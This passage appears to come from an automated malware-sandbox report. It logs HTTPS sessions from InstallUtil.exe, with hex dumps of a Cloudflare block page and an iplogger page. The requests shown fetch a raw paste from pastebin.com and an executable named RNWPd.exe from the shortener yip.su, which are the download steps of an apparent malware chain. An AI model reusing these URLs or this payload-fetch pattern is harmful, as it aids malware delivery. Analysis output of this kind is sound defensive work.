                            Data Ascii: round-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-
                            2024-09-10 16:21:29 UTC1369INData Raw: 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66
                            Data Ascii: or.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf
                            2024-09-10 16:21:29 UTC1369INData Raw: 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62
                            Data Ascii: pt><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;b
                            2024-09-10 16:21:29 UTC1369INData Raw: 74 3a 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69
                            Data Ascii: t:31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><di
                            2024-09-10 16:21:29 UTC162INData Raw: 2c 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: ,a.style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                            2024-09-10 16:21:29 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            13192.168.2.1149725104.20.3.2354437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:21:35 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                            Host: pastebin.com
                            Connection: Keep-Alive
                            2024-09-10 16:21:35 UTC222INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:21:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Frame-Options: SAMEORIGIN
                            Server: cloudflare
                            CF-RAY: 8c10c07e5f350c96-EWR
                            2024-09-10 16:21:35 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                            Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                            2024-09-10 16:21:35 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                            Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                            2024-09-10 16:21:35 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                            Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                            2024-09-10 16:21:35 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                            Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                            2024-09-10 16:21:35 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            14192.168.2.1149726188.114.97.34437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:21:35 UTC65OUTGET /RNWPd.exe HTTP/1.1
                            Host: yip.su
                            Connection: Keep-Alive
                            2024-09-10 16:21:35 UTC900INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:21:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            memory: 0.36197662353515625
                            expires: Tue, 10 Sep 2024 16:21:35 GMT
                            strict-transport-security: max-age=604800
                            strict-transport-security: max-age=31536000
                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                            x-frame-options: SAMEORIGIN
                            Cache-Control: max-age=14400
                            CF-Cache-Status: HIT
                            Age: 0
                            Last-Modified: Tue, 10 Sep 2024 16:21:35 GMT
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ToNq2sYkfPuERifbvYrHmdYq56cj%2BpWHEXI08gBnL3zmFh4nRuqRCQXkMtvFaJSOMpkE53Y%2FxN1DU5eJuhpmiEBTNeMXGxILZXwYydwULjdhBMTHuEc3K7w%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8c10c0828d8942b8-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-09-10 16:21:35 UTC469INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                            Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                            2024-09-10 16:21:35 UTC1369INData Raw: 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74
                            Data Ascii: ter" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta propert
                            2024-09-10 16:21:35 UTC1369INData Raw: 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a
                            Data Ascii: color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:
                            2024-09-10 16:21:35 UTC1369INData Raw: 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29
                            Data Ascii: rAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name)
                            2024-09-10 16:21:35 UTC1369INData Raw: 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d
                            Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
                            2024-09-10 16:21:35 UTC1369INData Raw: 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22
                            Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
                            2024-09-10 16:21:35 UTC156INData Raw: 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                            2024-09-10 16:21:35 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            15192.168.2.1149727104.20.3.2354437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:21:40 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                            Host: pastebin.com
                            Connection: Keep-Alive
                            2024-09-10 16:21:40 UTC222INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:21:40 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Frame-Options: SAMEORIGIN
                            Server: cloudflare
                            CF-RAY: 8c10c0a24ae58cec-EWR
                            2024-09-10 16:21:40 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                            Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                            2024-09-10 16:21:40 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                            Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                            2024-09-10 16:21:40 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                            Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
